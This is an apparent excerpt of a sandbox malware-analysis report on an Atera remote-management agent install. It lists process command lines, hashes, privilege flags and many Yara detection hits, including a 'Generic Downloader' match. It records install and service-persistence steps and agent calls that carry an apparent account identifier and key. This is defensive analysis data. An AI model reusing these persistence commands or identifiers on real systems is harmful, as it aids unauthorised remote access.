                                                                                                                                                                                                                                                                                              Imagebase:0x1779dac0000
                                                                                                                                                                                                                                                                                              File size:145'968 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1754093593.000001779DE80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1762296888.00000177B80E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1752871469.000001779DBF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1752871469.000001779DC31000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1755843182.000001779F829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1755843182.000001779F85A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1755843182.000001779F8D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1755843182.000001779F852000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1761585352.00000177B8045000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1755843182.000001779F91C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1762481931.00000177B82F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1752871469.000001779DC7F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1755843182.000001779F906000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1752871469.000001779DBF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1762481931.00000177B82C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1755843182.000001779F8D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1755843182.000001779F82C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1755843182.000001779F7A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000002.1763290215.00007FFD9B404000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000C.00000000.1718405720.000001779DAC2000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                                                              • Detection: 26%, ReversingLabs
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                                                              Start time:06:58:08
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x21c41e20000
                                                                                                                                                                                                                                                                                              File size:145'968 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2294249455.0000021C41ED0000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2355746152.0000021C5AFE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42A76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2364577218.0000021C5B491000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2392527211.0000021C5B928000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2296889526.0000021C42290000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C427D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42B9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42E23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2292749286.000000AF46BD5000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2294760147.0000021C42109000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C429FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42B39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C429EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2364577218.0000021C5B420000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42751000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2364577218.0000021C5B3A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42A83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42DEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2294760147.0000021C420BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42F44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2364577218.0000021C5B3EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2294760147.0000021C42080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                                                                              Start time:06:58:08
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6f92a0000
                                                                                                                                                                                                                                                                                              File size:72'192 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                                                              Start time:06:58:08
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                                                              Start time:06:58:09
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:rundll32.exe "C:\Windows\Installer\MSI56F2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6903546 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                                                                                                                                                                                                                                                                              Imagebase:0x880000
                                                                                                                                                                                                                                                                                              File size:61'440 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1807492407.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                                                                              Start time:06:58:23
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff699450000
                                                                                                                                                                                                                                                                                              File size:468'120 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                                                              Start time:06:58:23
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                                                              Start time:06:58:29
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "cb3e2cb9-55c1-438a-8389-94c341441cc1" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x2156b880000
                                                                                                                                                                                                                                                                                              File size:186'408 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:9D8D50D2789C2A8D847D7953518A96F6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1981577832.0000021500047000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1981577832.000002150008D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1984014112.000002156BD20000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000000.1961278345.000002156B882000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1983167584.000002156BA8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1983167584.000002156BA42000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1981577832.0000021500001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1983167584.000002156BA4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1983167584.000002156BA00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1981577832.0000021500135000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1981577832.0000021500079000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                                                              Start time:06:58:29
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "b007e062-743d-47e1-a870-a586f83a0d8d" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x15e7cf20000
                                                                                                                                                                                                                                                                                              File size:186'408 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:9D8D50D2789C2A8D847D7953518A96F6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1982795635.0000015E7D008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1982795635.0000015E7D085000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1982795635.0000015E7D000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1981546902.0000015E00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1981546902.0000015E00079000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1982795635.0000015E7D03C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1982795635.0000015E7D0C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1983698172.0000015E7D250000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1983854282.0000015E7D2E2000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.1982795635.0000015E7D0D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                                                                              Start time:06:58:29
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                                                                              Start time:06:58:29
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                                                                              Start time:06:58:32
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "8786f2fa-f7ec-48f3-845c-8cd509c85e9f" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x247406b0000
                                                                                                                                                                                                                                                                                              File size:186'408 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:9D8D50D2789C2A8D847D7953518A96F6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
